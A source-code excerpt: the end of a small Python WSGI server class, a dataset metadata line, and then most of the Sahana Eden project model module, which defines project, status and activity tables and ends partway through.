logger.debug("Webfront engine stopped.")
def _run_https(self):
logger.debug("Webfront engine(HTTPS) is running...")
conf_dir = environ.conf_dir()
keyfile = os.path.join(conf_dir, 'ava.key')
certfile = os.path.join(conf_dir, 'ava.crt')
self._https_listener = pywsgi.WSGIServer((self.listen_addr, self.secure_listen_port),
dispatcher,
keyfile=keyfile,
certfile=certfile)
logger.debug("Webfront engine(HTTPS) is listening on port: %d", self._https_listener.address[1])
self._https_listener.serve_forever()
def _run_http(self):
logger.debug("Webfront engine(HTTP) is running...")
self._http_listener = pywsgi.WSGIServer((self.listen_addr, self.listen_port),
dispatcher)
logger.debug("Webfront engine(HTTP) is listening on port: %d", self._http_listener.address[1])
self._http_listener.serve_forever()
| bsd-3-clause | 6,369,926,576,584,644,000 | 32.39823 | 104 | 0.590885 | false | 3.812121 | false | false | false |
flavour/tldrmp | modules/s3db/project.py | 2 | 259927 | # -*- coding: utf-8 -*-
""" Sahana Eden Project Model
@copyright: 2011-2013 (c) Sahana Software Foundation
@license: MIT
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
__all__ = ["S3ProjectModel",
"S3ProjectActivityModel",
"S3ProjectActivityTypeModel",
"S3ProjectActivityOrganisationModel",
"S3ProjectAnnualBudgetModel",
"S3ProjectBeneficiaryModel",
"S3ProjectCampaignModel",
"S3ProjectFrameworkModel",
"S3ProjectHazardModel",
"S3ProjectLocationModel",
"S3ProjectOrganisationModel",
"S3ProjectOutputModel",
"S3ProjectSectorModel",
"S3ProjectThemeModel",
"S3ProjectDRRModel",
"S3ProjectDRRPPModel",
"S3ProjectTaskModel",
"S3ProjectTaskHRMModel",
"S3ProjectTaskIReportModel",
"project_rheader",
"project_task_form_inject",
"project_task_controller",
]
import datetime
try:
import json # try stdlib (Python 2.6)
except ImportError:
try:
import simplejson as json # try external module
except:
import gluon.contrib.simplejson as json # fallback to pure-Python module
try:
# Python 2.7
from collections import OrderedDict
except:
# Python 2.6
from gluon.contrib.simplejson.ordered_dict import OrderedDict
from gluon import *
from gluon.dal import Row
from gluon.storage import Storage
from ..s3 import *
from s3layouts import S3AddResourceLink
# =============================================================================
class S3ProjectModel(S3Model):
"""
Project Model
Note: This module can be extended by 2 different modes:
- '3w': "Who's doing What Where"
suitable for use by multinational organisations tracking
projects at a high level
- sub-mode 'drr': Disaster Risk Reduction extensions
            - 'task': Suitable for use by a smaller organisation tracking tasks
within projects
There are also a number of other deployment_settings to control behaviour
This class contains the tables common to all uses
There are additional tables in other Models
"""
names = ["project_status",
"project_project",
"project_project_id",
"project_project_represent",
"project_human_resource",
"project_hfa_opts",
"project_jnap_opts",
"project_pifacc_opts",
"project_rfa_opts",
"project_theme_opts",
"project_theme_helps",
"project_hazard_opts",
"project_hazard_helps",
]
def model(self):
T = current.T
db = current.db
auth = current.auth
NONE = current.messages["NONE"]
human_resource_id = self.hrm_human_resource_id
settings = current.deployment_settings
mode_3w = settings.get_project_mode_3w()
mode_task = settings.get_project_mode_task()
mode_drr = settings.get_project_mode_drr()
use_codes = settings.get_project_codes()
use_sectors = settings.get_project_sectors()
multi_budgets = settings.get_project_multiple_budgets()
multi_orgs = settings.get_project_multiple_organisations()
add_component = self.add_component
configure = self.configure
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
set_method = self.set_method
# ---------------------------------------------------------------------
# Project Statuses
#
tablename = "project_status"
table = define_table(tablename,
Field("name", length=128,
notnull=True, unique=True,
label=T("Name")),
s3_comments(),
*s3_meta_fields())
# CRUD Strings
ADD_STATUS = T("Add Status")
crud_strings[tablename] = Storage(
title_create = ADD_STATUS,
title_display = T("Status Details"),
title_list = T("Statuses"),
title_update = T("Edit Status"),
#title_upload = T("Import Statuses"),
subtitle_create = T("Add New Status"),
label_list_button = T("List Statuses"),
label_create_button = ADD_STATUS,
label_delete_button = T("Delete Status"),
msg_record_created = T("Status added"),
msg_record_modified = T("Status updated"),
msg_record_deleted = T("Status deleted"),
msg_list_empty = T("No Statuses currently registered"))
# Reusable Field
represent = S3Represent(lookup=tablename, translate=True)
#none = T("Unknown"))
status_id = S3ReusableField("status_id", table,
label = T("Status"),
sortby = "name",
requires = IS_NULL_OR(
IS_ONE_OF(db, "project_status.id",
represent,
sort=True)),
represent = represent,
comment = S3AddResourceLink(title=ADD_STATUS,
c="project",
f="status"),
ondelete = "SET NULL")
# ---------------------------------------------------------------------
# Projects
#
LEAD_ROLE = settings.get_project_organisation_lead_role()
org_label = settings.get_project_organisation_roles()[LEAD_ROLE]
tablename = "project_project"
table = define_table(tablename,
self.super_link("doc_id", "doc_entity"),
# multi_orgs deployments use the separate project_organisation table
# - although Lead Org is still cached here to avoid the need for a virtual field to lookup
self.org_organisation_id(
label = org_label,
default = auth.root_org(),
requires = self.org_organisation_requires(
required = True,
# Only allowed to add Projects for Orgs that the user has write access to
updateable = True,
),
),
Field("name", unique=True, length=255,
label = T("Project Name"),
# Require unique=True if using IS_NOT_ONE_OF like here (same table,
# no filter) in order to allow both automatic indexing (faster)
# and key-based de-duplication (i.e. before field validation)
requires = [IS_NOT_EMPTY(error_message=T("Please fill this!")),
IS_NOT_ONE_OF(db, "project_project.name")]
),
Field("code",
label = T("Short Title / ID"),
readable = use_codes,
writable = use_codes,
),
Field("description", "text",
label = T("Description")),
status_id(),
# NB There is additional client-side validation for start/end date in the Controller
s3_date("start_date",
label = T("Start Date")
),
s3_date("end_date",
label = T("End Date")
),
# Free-text field with no validation (used by OCHA template currently)
Field("duration",
label = T("Duration"),
readable=False,
writable=False,
),
Field("calendar",
label = T("Calendar"),
readable = mode_task,
writable = mode_task,
requires = IS_NULL_OR(IS_URL()),
comment = DIV(_class="tooltip",
_title="%s|%s" % (T("Calendar"),
T("URL to a Google Calendar to display on the project timeline.")))),
# multi_budgets deployments handle on the Budgets Tab
Field("budget", "double",
readable = False if multi_budgets else True,
writable = False if multi_budgets else True,
label = T("Budget"),
represent = lambda v: \
IS_FLOAT_AMOUNT.represent(v, precision=2)),
s3_currency(readable = False if multi_budgets else True,
writable = False if multi_budgets else True,
),
Field("objectives", "text",
readable = mode_3w,
writable = mode_3w,
represent = lambda v: v or NONE,
label = T("Objectives")),
human_resource_id(label=T("Contact Person")),
s3_comments(comment=DIV(_class="tooltip",
_title="%s|%s" % (T("Comments"),
T("Outcomes, Impact, Challenges")))),
*s3_meta_fields())
# CRUD Strings
ADD_PROJECT = T("Add Project")
crud_strings[tablename] = Storage(
title_create = ADD_PROJECT,
title_display = T("Project Details"),
title_list = T("Projects"),
title_update = T("Edit Project"),
title_search = T("Search Projects"),
title_report = T("Project Report"),
title_upload = T("Import Projects"),
subtitle_create = T("Add New Project"),
label_list_button = T("List Projects"),
label_create_button = ADD_PROJECT,
label_delete_button = T("Delete Project"),
msg_record_created = T("Project added"),
msg_record_modified = T("Project updated"),
msg_record_deleted = T("Project deleted"),
msg_list_empty = T("No Projects currently registered"))
# Search Method
status_search_widget = S3SearchOptionsWidget(
name = "project_search_status",
label = T("Status"),
field = "status_id",
cols = 4,
)
simple = [
S3SearchSimpleWidget(name = "project_search_text_advanced",
label = T("Description"),
comment = T("Search for a Project by name, code, or description."),
field = ["name",
"code",
"description",
]
),
status_search_widget,
]
advanced = list(simple)
append = advanced.append
append(S3SearchOptionsWidget(
name = "project_search_organisation_id",
label = org_label,
field = "organisation_id",
cols = 3
))
append(S3SearchOptionsWidget(
name = "project_search_L0",
field = "location.location_id$L0",
location_level="L0",
cols = 3
))
append(S3SearchOptionsWidget(
name = "project_search_L1",
field = "location.location_id$L1",
location_level="L1",
cols = 3
))
#append(S3SearchOptionsWidget(
# name = "project_search_L2",
# label = T("Countries"),
# field = "location.location_id$L2",
# location_level="L2",
# cols = 3
# ))
if use_sectors:
if settings.get_ui_label_cluster():
sector = T("Cluster")
else:
sector = T("Sector")
append(S3SearchOptionsWidget(
name = "project_search_sector",
label = sector,
field = "sector.id",
options = self.org_sector_opts,
cols = 4
))
if mode_drr:
append(S3SearchOptionsWidget(
name = "project_search_hazard",
label = T("Hazard"),
field = "hazard.id",
options = self.project_hazard_opts,
help_field = self.project_hazard_helps,
cols = 4
))
if mode_3w:
append(S3SearchOptionsWidget(
name = "project_search_theme",
label = T("Theme"),
field = "theme.id",
options = self.project_theme_opts,
help_field = self.project_theme_helps,
cols = 4
))
if mode_drr:
project_hfa_opts = self.project_hfa_opts()
options = {}
            #options = {None: NONE}  # uncomment to allow searching for projects with no HFA
for key in project_hfa_opts.keys():
options[key] = "HFA %s" % key
append(S3SearchOptionsWidget(
name = "project_search_hfa",
label = T("HFA"),
field = "drr.hfa",
options = options,
help_field = project_hfa_opts,
cols = 5
))
if multi_orgs:
append(S3SearchOptionsWidget(
name = "project_search_partners",
field = "partner.organisation_id",
label = T("Partners"),
cols = 3,
))
append(S3SearchOptionsWidget(
name = "project_search_donors",
field = "donor.organisation_id",
label = T("Donors"),
cols = 3,
))
project_search = S3Search(simple = simple,
advanced = advanced)
# Resource Configuration
if settings.get_project_theme_percentages():
create_next = URL(c="project", f="project",
args=["[id]", "theme"])
elif mode_task:
if settings.get_project_milestones():
create_next = URL(c="project", f="project",
args=["[id]", "milestone"])
else:
create_next = URL(c="project", f="project",
args=["[id]", "task"])
else:
# Default
create_next = None
list_fields = ["id"]
append = list_fields.append
if use_codes:
append("code")
append("name")
append("organisation_id")
if mode_3w:
append((T("Locations"), "location.location_id"))
if use_sectors:
append((T("Sectors"), "sector.name"))
if mode_drr:
append((T("Hazards"), "hazard.name"))
#append("drr.hfa")
append((T("Themes"), "theme.name"))
if multi_orgs:
table.total_organisation_amount = Field.Lazy(self.project_total_organisation_amount)
append((T("Total Funding Amount"), "total_organisation_amount"))
if multi_budgets:
table.total_annual_budget = Field.Lazy(self.project_total_annual_budget)
append((T("Total Annual Budget"), "total_annual_budget"))
append("start_date")
append("end_date")
report_fields = list_fields
report_col_default = "location.location_id"
report_fact_fields = [(field, "count") for field in report_fields]
report_fact_default = "project.organisation_id"
#report_fact_default = "theme.name"
configure(tablename,
super_entity="doc_entity",
deduplicate=self.project_project_deduplicate,
onaccept=self.project_project_onaccept,
create_next=create_next,
search_method=project_search,
list_fields=list_fields,
report_options=Storage(
search = [status_search_widget] + advanced,
rows=report_fields,
cols=report_fields,
fact=report_fact_fields,
defaults=Storage(
rows="hazard.name",
cols=report_col_default,
fact=report_fact_default,
aggregate="count",
totals=True
)
),
context = {"location": "location.location_id",
"organisation": "organisation_id",
},
realm_components = ["human_resource",
"task",
"organisation",
"activity",
"activity_type",
"annual_budget",
"beneficiary",
"location",
"milestone",
"theme_percentage",
"document",
"image",
],
update_realm=True,
)
# Reusable Field
if use_codes:
project_represent = S3Represent(lookup=tablename,
field_sep = ": ",
fields=["code", "name"])
else:
project_represent = S3Represent(lookup=tablename)
project_id = S3ReusableField("project_id", table,
sortby="name",
requires = IS_NULL_OR(
IS_ONE_OF(db(auth.s3_accessible_query("update",
table)),
"project_project.id",
project_represent)),
represent = project_represent,
comment = S3AddResourceLink(c="project", f="project",
tooltip=T("If you don't see the project in the list, you can add a new one by clicking link 'Add Project'.")),
label = T("Project"),
ondelete = "CASCADE"
)
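        # Usage sketch (illustrative): other models embed this reusable field
        # to get a validated, consistently-represented foreign key, e.g.
        #   define_table("project_milestone",
        #                project_id(),
        #                ...)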
# Custom Methods
set_method("project", "project",
method="timeline",
action=self.project_timeline)
set_method("project", "project",
method="map",
action=self.project_map)
# Components
if multi_orgs:
# Organisations
add_component("project_organisation", project_project="project_id")
# Donors
add_component("project_organisation",
project_project=dict(
name="donor",
joinby="project_id",
filterby="role",
filterfor=[3], # Works for IFRC & DRRPP
))
# Partners
add_component("project_organisation",
project_project=dict(
name="partner",
joinby="project_id",
filterby="role",
filterfor=[2, 9], # Works for IFRC & DRRPP
))
# Sites
#add_component("project_site", project_project="project_id")
# Activities
add_component("project_activity", project_project="project_id")
# Activity Types
add_component("project_activity_type",
project_project=dict(link="project_activity_type_project",
joinby="project_id",
key="activity_type_id",
actuate="link"))
# Milestones
add_component("project_milestone", project_project="project_id")
# Outputs
add_component("project_output", project_project="project_id")
# Tasks
add_component("project_task",
project_project=dict(link="project_task_project",
joinby="project_id",
key="task_id",
actuate="replace",
autocomplete="name",
autodelete=False))
# Annual Budgets
add_component("project_annual_budget", project_project="project_id")
# Beneficiaries
add_component("project_beneficiary", project_project="project_id")
# Hazards
add_component("project_hazard",
project_project=dict(link="project_hazard_project",
joinby="project_id",
key="hazard_id",
actuate="hide"))
# Human Resources
add_component("project_human_resource", project_project="project_id")
# Locations
add_component("project_location", project_project="project_id")
# Sectors
add_component("org_sector",
project_project=dict(link="project_sector_project",
joinby="project_id",
key="sector_id",
actuate="hide"))
# Format needed by S3Filter
add_component("project_sector_project",
project_project="project_id")
# Themes
add_component("project_theme",
project_project=dict(link="project_theme_project",
joinby="project_id",
key="theme_id",
actuate="hide"))
# Format needed by S3Filter
add_component("project_theme_project",
project_project="project_id")
# DRR
if mode_drr:
add_component("project_drr",
project_project=dict(joinby="project_id",
multiple = False))
# ---------------------------------------------------------------------
# Project Human Resources
#
define_table("project_human_resource",
project_id(empty=False),
human_resource_id(empty=False),
*s3_meta_fields()
)
configure("project_human_resource",
onvalidation=self.project_human_resource_onvalidation,
list_fields=[#"project_id",
"human_resource_id$person_id",
"human_resource_id$organisation_id",
"human_resource_id$job_title",
"human_resource_id$status"
],
)
# ---------------------------------------------------------------------
# Pass names back to global scope (s3.*)
#
return dict(
project_project_id = project_id,
project_project_represent = project_represent,
project_hfa_opts = self.project_hfa_opts,
project_jnap_opts = self.project_jnap_opts,
project_pifacc_opts = self.project_pifacc_opts,
project_rfa_opts = self.project_rfa_opts,
project_theme_opts = self.project_theme_opts,
project_theme_helps = self.project_theme_helps,
project_hazard_opts = self.project_hazard_opts,
project_hazard_helps = self.project_hazard_helps,
)
# -------------------------------------------------------------------------
def defaults(self):
""" Safe defaults for model-global names if module is disabled """
dummy = S3ReusableField("dummy_id", "integer",
readable=False,
writable=False)
return dict(project_project_id = lambda **attr: dummy("project_id"),
)
# -------------------------------------------------------------------------
@staticmethod
def project_total_organisation_amount(row):
""" Total of project_organisation amounts for project"""
if "project_project" in row:
project_id = row["project_project.id"]
elif "id" in row:
project_id = row["id"]
else:
return 0
table = current.s3db.project_organisation
query = (table.deleted != True) & \
(table.project_id == project_id)
sum_field = table.amount.sum()
return current.db(query).select(sum_field).first()[sum_field]
# -------------------------------------------------------------------------
@staticmethod
def project_total_annual_budget(row):
""" Total of all annual budgets for project"""
if "project_project" in row:
project_id = row["project_project.id"]
elif "id" in row:
project_id = row["id"]
else:
return 0
table = current.s3db.project_annual_budget
query = (table.deleted != True) & \
(table.project_id == project_id)
sum_field = table.amount.sum()
return current.db(query).select(sum_field).first()[sum_field] or \
current.messages["NONE"]
# -------------------------------------------------------------------------
@staticmethod
def project_project_onaccept(form):
"""
After DB I/O tasks for Project records
"""
settings = current.deployment_settings
if settings.get_project_multiple_organisations():
# Create/update project_organisation record from the organisation_id
# (Not in form.vars if added via component tab)
vars = form.vars
id = vars.id
organisation_id = vars.organisation_id or \
current.request.post_vars.organisation_id
if organisation_id:
lead_role = settings.get_project_organisation_lead_role()
otable = current.s3db.project_organisation
query = (otable.project_id == id) & \
(otable.role == lead_role)
# Update the lead organisation
count = current.db(query).update(organisation_id = organisation_id)
if not count:
# If there is no record to update, then create a new one
otable.insert(project_id = id,
organisation_id = organisation_id,
role = lead_role,
)
# -------------------------------------------------------------------------
@staticmethod
def project_project_deduplicate(item):
""" Import item de-duplication """
if item.tablename == "project_project":
data = item.data
table = item.table
# If we have a code, then assume this is unique, however the same
# project name may be used in multiple locations
if "code" in data and data.code:
query = (table.code.lower() == data.code.lower())
elif "name" in data and data.name:
query = (table.name.lower() == data.name.lower())
else:
# Nothing we can work with
return
duplicate = current.db(query).select(table.id,
limitby=(0, 1)).first()
if duplicate:
item.id = duplicate.id
item.method = item.METHOD.UPDATE
return
# -------------------------------------------------------------------------
@staticmethod
def project_map(r, **attr):
"""
Display a filterable set of Projects on a Map
- assumes mode_3w
- currently assumes that theme_percentages=True
@ToDo: Browse by Year
"""
if r.representation == "html" and \
r.name == "project":
T = current.T
db = current.db
s3db = current.s3db
response = current.response
ptable = s3db.project_project
ttable = s3db.project_theme
tptable = s3db.project_theme_project
ltable = s3db.gis_location
# Search Widget
themes_dropdown = SELECT(_multiple=True,
_id="project_theme_id",
_style="height:80px;")
append = themes_dropdown.append
table = current.s3db.project_theme
themes = current.db(table.deleted == False).select(table.id,
table.name,
orderby=table.name)
for theme in themes:
append(OPTION(theme.name,
_value=theme.id,
_selected="selected"))
form = FORM(themes_dropdown)
# Map
# The Layer of Projects to show on the Map
# @ToDo: Create a URL to the project_polygons custom method & use that
# @ToDo: Pass through attributes that we don't need for the 1st level of mapping
# so that they can be used without a screen refresh
url = URL(f="location", extension="geojson")
layer = {"name" : T("Projects"),
"id" : "projects",
"tablename" : "project_location",
"url" : url,
"active" : True,
#"marker" : None,
}
map = current.gis.show_map(collapsed = True,
feature_resources = [layer],
)
output = dict(title = T("Projects Map"),
form = form,
map = map,
)
# Add Static JS
response.s3.scripts.append(URL(c="static",
f="scripts",
args=["S3", "s3.project_map.js"]))
response.view = "map.html"
return output
else:
raise HTTP(501, current.messages.BADMETHOD)
# -------------------------------------------------------------------------
@staticmethod
def project_polygons(r, **attr):
"""
Export Projects as GeoJSON Polygons to view on the map
- currently assumes that theme_percentages=True
@ToDo: complete
"""
db = current.db
s3db = current.s3db
ptable = s3db.project_project
ttable = s3db.project_theme
tptable = s3db.project_theme_project
pltable = s3db.project_location
ltable = s3db.gis_location
vars = current.request.get_vars
themes = db(ttable.deleted == False).select(ttable.id,
ttable.name,
orderby = ttable.name)
# Total the Budget spent by Theme for each country
countries = {}
query = (ptable.deleted == False) & \
(tptable.project_id == ptable.id) & \
(ptable.id == pltable.project_id) & \
(ltable.id == pltable.location_id)
#if "theme_id" in vars:
# query = query & (tptable.id.belongs(vars.theme_id))
projects = db(query).select()
for project in projects:
# Only show those projects which are only within 1 country
# @ToDo
_countries = project.location_id
if len(_countries) == 1:
country = _countries[0]
if country in countries:
budget = project.project_project.total_annual_budget()
theme = project.project_theme_project.theme_id
percentage = project.project_theme_project.percentage
countries[country][theme] += budget * percentage
else:
name = db(ltable.id == country).select(ltable.name).first().name
countries[country] = dict(name = name)
# Init all themes to 0
for theme in themes:
countries[country][theme.id] = 0
# Add value for this record
budget = project.project_project.total_annual_budget()
theme = project.project_theme_project.theme_id
percentage = project.project_theme_project.percentage
countries[country][theme] += budget * percentage
query = (ltable.id.belongs(countries))
locations = db(query).select(ltable.id,
ltable.wkt)
for location in locations:
pass
# Convert to GeoJSON
output = json.dumps({})
current.response.headers["Content-Type"] = "application/json"
return output
# -------------------------------------------------------------------------
@staticmethod
def project_timeline(r, **attr):
"""
Display the project on a Simile Timeline
http://www.simile-widgets.org/wiki/Reference_Documentation_for_Timeline
Currently this just displays a Google Calendar
@ToDo: Add Milestones
@ToDo: Filters for different 'layers'
@ToDo: export milestones/tasks as .ics
"""
if r.representation == "html" and r.name == "project":
appname = current.request.application
response = current.response
s3 = response.s3
calendar = r.record.calendar
# Add core Simile Code
s3.scripts.append("/%s/static/scripts/simile/timeline/timeline-api.js" % appname)
# Pass vars to our JS code
s3.js_global.append('''S3.timeline.calendar="%s"''' % calendar)
# Add our control script
if s3.debug:
s3.scripts.append("/%s/static/scripts/S3/s3.timeline.js" % appname)
else:
s3.scripts.append("/%s/static/scripts/S3/s3.timeline.min.js" % appname)
# Create the DIV
item = DIV(_id="s3timeline",
_style="height:400px;border:1px solid #aaa;font-family:Trebuchet MS,sans-serif;font-size:85%;")
output = dict(item=item)
output["title"] = current.T("Project Calendar")
# Maintain RHeader for consistency
if "rheader" in attr:
rheader = attr["rheader"](r)
if rheader:
output["rheader"] = rheader
response.view = "timeline.html"
return output
else:
raise HTTP(501, current.messages.BADMETHOD)
# -------------------------------------------------------------------------
@staticmethod
def project_human_resource_onvalidation(form):
"""
Prevent the same hrm_human_resource record being added more than
once.
"""
# The project human resource table
hr = current.s3db.project_human_resource
# Fetch the first row that has the same project and human resource ids
query = (hr.human_resource_id == form.vars.human_resource_id) & \
(hr.project_id == form.request_vars.project_id)
row = current.db(query).select(hr.id,
limitby=(0, 1)).first()
# If we found a row we have a duplicate. Return an error to the user.
if row:
form.errors.human_resource_id = current.T("Record already exists")
return
# -------------------------------------------------------------------------
@staticmethod
def project_hazard_opts():
"""
Provide the options for the Hazard search filter
- defined in the model used to ensure a good load order
"""
table = current.s3db.project_hazard
opts = current.db(table.deleted == False).select(table.id,
table.name,
orderby=table.name)
T = current.T
od = OrderedDict()
for opt in opts:
od[opt.id] = T(opt.name) if opt.name else ""
return od
# -------------------------------------------------------------------------
@staticmethod
def project_hazard_helps():
"""
Provide the help tooltips for the Hazard search filter
- defined in the model used to ensure a good load order
"""
table = current.s3db.project_hazard
opts = current.db(table.deleted == False).select(table.id,
table.comments)
T = current.T
d = {}
for opt in opts:
d[opt.id] = T(opt.comments) if opt.comments else ""
return d
# -------------------------------------------------------------------------
@staticmethod
def project_hfa_opts():
"""
Provide the options for the HFA search filter
            - defined in the model to ensure a good load order
            HFA: Hyogo Framework for Action
"""
T = current.T
return {
1: T("HFA1: Ensure that disaster risk reduction is a national and a local priority with a strong institutional basis for implementation."),
2: T("HFA2: Identify, assess and monitor disaster risks and enhance early warning."),
3: T("HFA3: Use knowledge, innovation and education to build a culture of safety and resilience at all levels."),
4: T("HFA4: Reduce the underlying risk factors."),
5: T("HFA5: Strengthen disaster preparedness for effective response at all levels."),
}
# -------------------------------------------------------------------------
@staticmethod
def project_jnap_opts():
"""
            Provide the options for the JNAP search filter (currently unused)
            - defined in the model to ensure a good load order
JNAP (Joint National Action Plan for Disaster Risk Management and Climate Change Adaptation):
applies to Cook Islands only
"""
T = current.T
return {
1: T("JNAP-1: Strategic Area 1: Governance"),
2: T("JNAP-2: Strategic Area 2: Monitoring"),
3: T("JNAP-3: Strategic Area 3: Disaster Management"),
4: T("JNAP-4: Strategic Area 4: Risk Reduction and Climate Change Adaptation"),
}
# -------------------------------------------------------------------------
@staticmethod
def project_pifacc_opts():
"""
Provide the options for the PIFACC search filter (currently unused)
            - defined in the model to ensure a good load order
PIFACC (Pacific Islands Framework for Action on Climate Change):
applies to Pacific countries only
"""
T = current.T
return {
1: T("PIFACC-1: Implementing Tangible, On-Ground Adaptation Measures"),
2: T("PIFACC-2: Governance and Decision Making"),
3: T("PIFACC-3: Improving our understanding of climate change"),
4: T("PIFACC-4: Education, Training and Awareness"),
5: T("PIFACC-5: Mitigation of Global Greenhouse Gas Emissions"),
6: T("PIFACC-6: Partnerships and Cooperation"),
}
# -------------------------------------------------------------------------
@staticmethod
def project_rfa_opts():
"""
Provide the options for the RFA search filter
            - defined in the model to ensure a good load order
            RFA (Regional Framework for Action): applies to Pacific countries only
"""
T = current.T
return {
1: T("RFA1: Governance-Organisational, Institutional, Policy and Decision Making Framework"),
2: T("RFA2: Knowledge, Information, Public Awareness and Education"),
3: T("RFA3: Analysis and Evaluation of Hazards, Vulnerabilities and Elements at Risk"),
4: T("RFA4: Planning for Effective Preparedness, Response and Recovery"),
5: T("RFA5: Effective, Integrated and People-Focused Early Warning Systems"),
6: T("RFA6: Reduction of Underlying Risk Factors"),
}
# -------------------------------------------------------------------------
@staticmethod
def project_theme_opts():
"""
Provide the options for the Theme search filter
            - defined in the model to ensure a good load order
"""
table = current.s3db.project_theme
opts = current.db(table.deleted == False).select(table.id,
table.name,
orderby=table.name)
T = current.T
od = OrderedDict()
for opt in opts:
od[opt.id] = T(opt.name) if opt.name else ""
return od
# -------------------------------------------------------------------------
@staticmethod
def project_theme_helps():
"""
Provide the help tooltips for the Theme search filter
            - defined in the model to ensure a good load order
"""
table = current.s3db.project_theme
opts = current.db(table.deleted == False).select(table.id,
table.comments)
T = current.T
d = {}
for opt in opts:
d[opt.id] = T(opt.comments) if opt.comments else ""
return d
# =============================================================================
class S3ProjectActivityModel(S3Model):
"""
Project Activity Model
This model holds the specific Activities for Projects
- currently used in mode_task but not mode_3w
"""
names = ["project_activity",
"project_activity_id",
"project_activity_activity_type",
]
def model(self):
T = current.T
db = current.db
add_component = self.add_component
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
settings = current.deployment_settings
mode_task = settings.get_project_mode_task()
# ---------------------------------------------------------------------
# Project Activity
#
tablename = "project_activity"
table = define_table(tablename,
# Instance
self.super_link("doc_id", "doc_entity"),
s3_datetime(),
self.project_project_id(),
Field("name",
label = T("Name"),
requires = IS_NOT_EMPTY()
),
self.project_activity_type_id(),
self.gis_location_id(
widget = S3LocationSelectorWidget(hide_address=True)
),
# Which contact is this?
# Implementing Org should be a human_resource_id
# Beneficiary could be a person_id
# Either way label should be clear
self.pr_person_id(label=T("Contact Person")),
Field("time_estimated", "double",
readable = mode_task,
writable = mode_task,
label = "%s (%s)" % (T("Time Estimate"),
T("hours"))
),
Field("time_actual", "double",
readable = mode_task,
# Gets populated from constituent Tasks
writable = False,
label = "%s (%s)" % (T("Time Taken"),
T("hours"))
),
s3_comments(),
*s3_meta_fields())
# CRUD Strings
ACTIVITY = T("Activity")
ACTIVITY_TOOLTIP = T("If you don't see the activity in the list, you can add a new one by clicking link 'Add Activity'.")
ADD_ACTIVITY = T("Add Activity")
crud_strings[tablename] = Storage(
title_create = ADD_ACTIVITY,
title_display = T("Activity Details"),
title_list = T("Activities"),
title_update = T("Edit Activity"),
title_search = T("Search Activities"),
title_upload = T("Import Activity Data"),
title_report = T("Activity Report"),
subtitle_create = T("Add New Activity"),
label_list_button = T("List Activities"),
label_create_button = ADD_ACTIVITY,
msg_record_created = T("Activity Added"),
msg_record_modified = T("Activity Updated"),
msg_record_deleted = T("Activity Deleted"),
msg_list_empty = T("No Activities Found")
)
# Search Method
filter_widgets = [S3OptionsFilter("activity_type_id",
label=T("Type"),
represent="%(name)s",
widget="multiselect",
),
]
# Resource Configuration
report_fields = []
append = report_fields.append
append((T("Project"), "project_id"))
append((T("Activity"), "name"))
append((T("Activity Type"), "activity_type.name"))
if settings.get_project_sectors():
append((T("Sector"), "project_id$sector.name"))
append((T("Theme"), "project_id$theme.name"))
if settings.get_project_mode_drr():
append((T("Hazard"), "project_id$hazard.name"))
append((T("HFA"), "project_id$drr.hfa"))
list_fields = ["name",
"project_id",
"activity_type.name",
"comments"
]
if mode_task:
list_fields.insert(3, "time_estimated")
list_fields.insert(4, "time_actual")
append((T("Time Estimated"), "time_estimated"))
append((T("Time Actual"), "time_actual"))
#create_next = URL(c="project", f="activity",
# args=["[id]", "task"])
#else:
# create_next = URL(c="project", f="activity", args=["[id]"])
self.configure(tablename,
super_entity="doc_entity",
# Leave these workflows for Templates
#create_next=create_next,
deduplicate=self.project_activity_deduplicate,
filter_widgets = filter_widgets,
report_options=Storage(
rows=report_fields,
cols=report_fields,
fact=report_fields,
defaults=Storage(
rows="activity.project_id",
cols="activity.name",
fact="sum(activity.time_actual)",
totals=True
)
),
list_fields = list_fields,
)
# Reusable Field
activity_id = S3ReusableField("activity_id", table,
sortby="name",
requires = IS_NULL_OR(
IS_ONE_OF(db, "project_activity.id",
self.project_activity_represent,
sort=True)),
represent = self.project_activity_represent,
label = ACTIVITY,
comment = S3AddResourceLink(ADD_ACTIVITY,
c="project", f="activity",
tooltip=ACTIVITY_TOOLTIP),
ondelete = "CASCADE")
# Components
# Activity Types
add_component("project_activity_type",
project_activity=dict(link="project_activity_activity_type",
joinby="activity_id",
key="activity_type_id",
actuate="replace",
autocomplete="name",
autodelete=False))
# Beneficiaries
add_component("project_beneficiary",
project_activity=dict(link="project_beneficiary_activity",
joinby="activity_id",
key="beneficiary_id",
actuate="hide"))
# Format for InlineComponent/filter_widget
add_component("project_beneficiary_activity",
project_activity="activity_id")
# Tasks
add_component("project_task",
project_activity=dict(link="project_task_activity",
joinby="activity_id",
key="task_id",
actuate="replace",
autocomplete="name",
autodelete=False))
# Coalitions
add_component("org_group",
project_activity=dict(link="project_activity_group",
joinby="activity_id",
key="group_id",
actuate="hide"))
# Format for InlineComponent/filter_widget
add_component("project_activity_group",
project_activity="activity_id")
# ---------------------------------------------------------------------
# Activity Type - Activity Link Table
#
tablename = "project_activity_activity_type"
table = define_table(tablename,
activity_id(empty=False),
self.project_activity_type_id(empty=False),
*s3_meta_fields())
crud_strings[tablename] = Storage(
title_create = T("New Activity Type"),
title_display = T("Activity Type"),
title_list = T("Activity Types"),
title_update = T("Edit Activity Type"),
title_search = T("Search Activity Types"),
title_upload = T("Import Activity Type data"),
subtitle_create = T("Add New Activity Type"),
label_list_button = T("List Activity Types"),
label_create_button = T("Add Activity Type to Activity"),
msg_record_created = T("Activity Type added to Activity"),
msg_record_modified = T("Activity Type Updated"),
